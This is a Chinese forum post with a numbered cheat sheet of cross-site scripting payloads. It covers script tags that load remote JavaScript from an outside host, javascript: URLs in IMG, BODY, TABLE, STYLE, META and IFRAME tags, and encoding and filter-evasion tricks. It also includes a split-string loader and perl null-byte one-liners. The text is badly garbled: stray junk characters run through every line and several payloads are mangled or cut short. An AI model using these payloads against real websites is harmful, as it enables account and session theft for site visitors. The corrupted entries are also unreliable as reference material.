(1)普通的XSS JavaScript注入
( k& z: t8 u/ w: d1 R/ d<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 ]# G0 b ]5 h) [: w. Z5 H
(99)另类弹框5 R9 }7 q1 f: I1 [
<q/oncut=alert()>19 R3 b X9 B$ R* L0 Q$ S( X$ ^2 ?
<s/onclick=alert()>b6 t! u! s$ z1 I
<XSS=" onclick="alert(1)//">clickme</SSX=">
7 p( z) R) ^1 S: o <zzz onclick=alert`1`>clickme</zzz>
# D9 U9 L2 a2 u0 i <a onclick=alert`1`>clickme</a>
" G4 }# N' B0 n<a=">clickme</a=">
5 ~2 O! \9 u3 M! A+ P<a=">clickme</a>0 H, {7 ~+ a' @& ~( U# x- ^) d
<z=">clickme</z=">
! B% |8 U9 ? n: J<z onclick=alert`1`>clickme</z>
, I* u* C c7 v. k' z1 Y2 i& e) e. W* K# X. N. P0 P
(2)IMG标签XSS使用JavaScript命令) }) K7 `/ L M, w
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( s! M6 d- Z! H: p: {8 @$ [
% H1 R0 s0 B" u9 o* b(3)IMG标签无分号无引号
8 B5 U$ h& N$ G1 s; s- ~<IMG SRC=javascript:alert(‘XSS’)>
3 `+ A6 U8 l( F$ Z* H# U& E8 k2 ]% \; ~+ q% M
(4)IMG标签大小写不敏感; O; k* N$ e1 l0 V/ N
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) {. T& W7 a2 g/ D
! N& Q; M/ [3 U2 I! {3 v2 M
(5)HTML编码(必须有分号). b; ]: e* U/ f$ k4 s, e
<IMG SRC=javascript:alert(“XSS”)>
- [4 s3 e+ V; b( T( s/ X6 X, }' ]' e# c7 D1 Y
(6)修正缺陷IMG标签* }! @) C, p6 M/ k- J
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ ?5 I# F$ Z! q( b$ g2 B
9 C: Y2 s/ b0 A' {& t(7)formCharCode标签(计算器)
: z1 Q9 l0 s* n1 Q0 J* C/ N<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. V0 Z H3 y; [- n% C6 @, x7 V$ p
4 F, w8 L8 {6 B$ d1 i2 Y4 s. M(8)UTF-8的Unicode编码(计算器)
! W2 |, }. T* a& J% ~1 S5 B<IMG SRC=jav..省略..S')>
, S1 L7 z% j! ~5 n
: @3 j/ t* O6 r' H2 `(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 \( E8 R9 _/ c- I7 u7 N* _4 l# _/ D: D
<IMG SRC=jav..省略..S')>4 S; {/ u! N0 l) P8 d1 c' F
" L; i2 C7 O5 \ P2 r; G: [
(10)十六进制编码也是没有分号(计算器)
% B _& f0 @4 E. I* K0 S<IMG SRC=\'#\'" /span>
) l# R; {, E/ a& F
- V/ D, \0 l3 Y8 ~(11)嵌入式标签,将Javascript分开# b$ l4 v* S; T. U0 F/ ^
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>% |& `" S' I9 r: B2 U) l
9 j t7 W& o0 G$ H3 a9 w+ r: _& d
(12)嵌入式编码标签,将Javascript分开- B1 k1 F) x; Z7 q; w
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 X! g4 V' R& q
! T$ E$ P6 T, f3 E(13)嵌入式换行符* c, j3 a- L9 \
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
% A' G8 @' a# q M
- H1 q& D! u0 ~1 _9 y(14)嵌入式回车
9 a0 ?, m" f5 ]6 G% H<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ z. K4 M7 [' W0 E; S0 _
- O% X# O" b# `* q2 c(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 S; o7 ?# f7 H. J5 F! e5 j2 ^' p<IMG SRC=\'#\'" /span>
" a# N: T* v8 u% A, T( q4 Y7 c( ?5 k+ d# h, V9 N
(16)解决限制字符(要求同页面)
, K) u. w- w+ }( `3 c0 o- U9 y# l<script>z=’document.’</script>
& n5 l. ?/ E6 P- k9 a) m* h<script>z=z+’write(“‘</script>
4 W3 J3 d4 X2 K& K( |0 A% d<script>z=z+’<script’</script>
! f1 w6 E$ f" F7 O<script>z=z+’ src=ht’</script>
: {+ o% }+ E' B/ i. w<script>z=z+’tp://ww’</script>
; b' A. R. Y: Z<script>z=z+’w.shell’</script>
) M1 P8 m* H. e) R<script>z=z+’.net/1.’</script># b+ A% H: F f+ A2 C; i+ F
<script>z=z+’js></sc’</script>
$ C' [; T4 J l5 }<script>z=z+’ript>”)’</script>8 H' S& u+ m; r% @/ f; g; e
<script>eval_r(z)</script>
- @* }" m, t. c3 T8 r; k, r" y" g
(17)空字符- v5 ]; c" Z; i5 z! v
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
1 B6 W4 V0 F" q1 A3 ~ c/ U9 |7 S. W
0 h9 F+ u" r* R8 ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 U6 A2 Z8 i0 U2 H2 d0 k
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 d' z( Y8 ~! N7 R' z; t7 S
6 D1 k, M- W+ ?, F" v(19)Spaces和meta前的IMG标签
, ~8 ^8 O7 \7 m" ~<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>5 X) G R& B4 i/ j, `1 g. O& {
5 C7 Q( U. y4 r) h' `0 q! p(20)Non-alpha-non-digit XSS
$ S! D) e9 Z5 S6 l% |% |7 X<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
% t0 n0 K9 ?* ^+ q" d i7 A+ u+ W& K1 X: k2 J+ Y
(21)Non-alpha-non-digit XSS to 2. S. _3 G" J, F( C; n6 ? t! S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& o* K R3 j& h1 i; r: ^% _" j6 X+ _8 A8 E, [6 ?/ B1 i
(22)Non-alpha-non-digit XSS to 3
: t. Q' u/ @; T! B# W4 V<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
/ d0 Z- Y" G. [8 ]$ d* k) j7 ~
4 o H2 o% b9 e7 {: s9 Q& |+ r(23)双开括号+ r# M4 _: n2 Y; O, r3 S2 v Y5 h
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; Y0 M3 D- T7 ]: l( H- i+ z. {
, n2 U. R3 u1 g4 x8 m$ y' a6 O(24)无结束脚本标记(仅火狐等浏览器)
. [' x5 B( \* T1 o' Q* o1 V<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> i% U' R, r9 d% i' Q! S
/ x) k9 r1 N( O5 v0 c9 v
(25)无结束脚本标记2, v% n, ]9 z) \+ D% r
<SCRIPT SRC=//3w.org/XSS/xss.js>
& j/ r; u* C( D. G! S0 G+ d$ d9 d% B$ \' \0 I/ g$ k
(26)半开的HTML/JavaScript XSS8 [0 l" ?, ~! s! f+ L& P0 h4 \6 g
<IMG SRC=\'#\'" /span>3 s( E# U* {( v
" @ j8 r" |6 e% q% Y6 Z: S" z
(27)双开角括号
; n* \! y% u) f* [( ~" f5 @1 w<iframe src=http://3w.org/XSS.html < `# u% N G' z( ^, m) R' H0 [
+ }& f+ N1 {# D9 U) \" I$ Z
(28)无单引号 双引号 分号
1 G- N" p. C; B3 h" I( d<SCRIPT>a=/XSS/ P! w& }, l/ s
alert(a.source)</SCRIPT>& B* w- G) _( s; ^7 t: ]3 c
0 s, Q4 H; B8 s6 I6 r* J(29)换码过滤的JavaScript/ i) Z4 M, X6 j. m4 B6 T" w, l
\”;alert(‘XSS’);//" c0 \9 s6 G$ \' R1 q( T
5 d% \; }; k l8 ]$ ^) J* K(30)结束Title标签
) e4 N* ?4 m+ R</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
x7 Q: m' e- Y6 k a e5 O M
- Q$ T ^" y8 k# j2 l(31)Input Image
0 X7 Q E, P4 p1 P<INPUT SRC=\'#\'" /span>
h7 Z! u2 ^% w- k3 S# o! H o& V) [
% e! f' u6 t8 O5 ](32)BODY Image% U1 s: _0 S u9 {6 r' _% W
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 `; N9 _$ P; K2 s0 E7 t9 J/ S3 ?( Q' d! A8 `
(33)BODY标签% p8 D% K1 l- ^. Y
<BODY(‘XSS’)>1 b+ D* h$ o( c
& Y4 U* ^" N" X- p" Y4 _4 G- u7 j2 `) O# Y
(34)IMG Dynsrc* z+ ]. Q- g% F" ?% C: V" S# C
<IMG DYNSRC=\'#\'" /span>
; c; Q1 \2 P: r1 T
* v$ H4 Q; W6 f- ]/ c- B1 P( k(35)IMG Lowsrc
: g6 q% y% T1 J<IMG LOWSRC=\'#\'" /span>
) w6 X ^9 m* v, N+ A9 ]; j: `: @0 x3 P2 i6 g0 P
(36)BGSOUND0 ^' @( \' n! f4 z9 p- Z0 w
<BGSOUND SRC=\'#\'" /span>
, N8 q5 B- i! K/ l) k* k* s7 J, m, p( @( |1 j# U9 \
(37)STYLE sheet. w( |, n" H6 |1 e; l& T
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) A+ C" t- o6 n1 f) E$ ^3 z+ ?
3 V8 ^ B2 A4 ~
(38)远程样式表
( C# F( l# b2 U2 C$ D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 V6 B" h# v$ F
$ a+ ^" K! j" n" n4 e) u! ~
(39)List-style-image(列表式)
. } a; O2 L; N2 \* }1 e( b<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 B9 `# \1 \* K$ g/ s, `% I
- o) ]- @- ]; L" Z0 h
(40)IMG VBscript
6 X$ J) |+ p1 b: j<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
; T, A' Y2 L5 d+ Y, H6 V" l9 J. ^/ U
(41)META链接url
9 l3 y3 h1 S9 l- B! W# ^9 O8 s0 g<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>. m+ P5 ]- O9 d2 y4 V* w
6 q7 A. Y; P3 y( Q3 O6 d0 ?8 w(42)Iframe4 [$ {) W! b4 l* }/ r8 V% e
<IFRAME SRC=\'#\'" /IFRAME>
8 o4 U4 U9 X: e: u* e0 k4 `) n, g( b" m* P% _- o9 W: x0 ~4 l, ^
(43)Frame
8 P$ n% c5 L- M/ I1 b% ^<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>2 U/ e0 U! V7 H. R+ ]
: I# t. W; x0 m. V(44)Table
8 p d# W# Q% h9 ^8 T<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& b; }* _! U8 p7 r# A z
7 r1 z* Q7 }" \( W(45)TD' _5 b$ V" [7 H7 \" n9 m
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 _7 _& P8 k$ w% O
- C- ^9 \1 V* ?! W! R(46)DIV background-image5 f7 l. Y5 {4 G8 h7 k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; z) A& \; m" @* i- |
* l1 R! G5 k( c7 |7 a$ j& N0 P
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
5 r; r& @5 A6 ~' O( z: {<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>* t* r5 `, t1 O9 P7 F1 n' @
, E; H: O- h; R) q(48)DIV expression
/ p( s! _9 z! y( s! j<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 U, H3 R0 w& f* q
% p' Y3 ?8 V5 v* n; ~. ~
(49)STYLE属性分拆表达
+ U/ w) D& W4 I' F! L4 }$ a; j<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 K$ n$ H* r+ v1 I3 w
0 H; l& c' J9 P(50)匿名STYLE(组成:开角号和一个字母开头). F+ W% ] n& H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: `& h2 A- m2 Z6 W4 c, }1 D2 Z, g; ?7 G$ t* ^' l
(51)STYLE background-image
) J# L1 c' U, h0 d, }( ]/ P. C<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( {9 t" g" V1 B9 d
; h3 ?- ?' Z: S1 d# [+ K8 J* m
(52)IMG STYLE方式
, y! I2 O! O! w8 Yexppression(alert(“XSS”))’>7 y1 n- \6 X+ H8 p/ X
# a7 v& B! D; o: W- h(53)STYLE background" f; Q1 ?7 |& l9 X6 j2 H
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# i! ?8 M- p& u& P' G0 U! [, j; Q9 y) O* S5 h0 T3 p* P8 \
(54)BASE
6 u5 s; k" ]. d6 |- Z! d, [<BASE HREF=”javascript:alert(‘XSS’);//”>% l; e% |% C* X* r6 y
+ [5 ?. [8 u3 X- t(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
9 @3 `7 T; e% S. x8 ~' N<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>$ O/ n' d8 u8 b" F
|
发表于 2016-4-28 10:06:15
收藏
支持
反对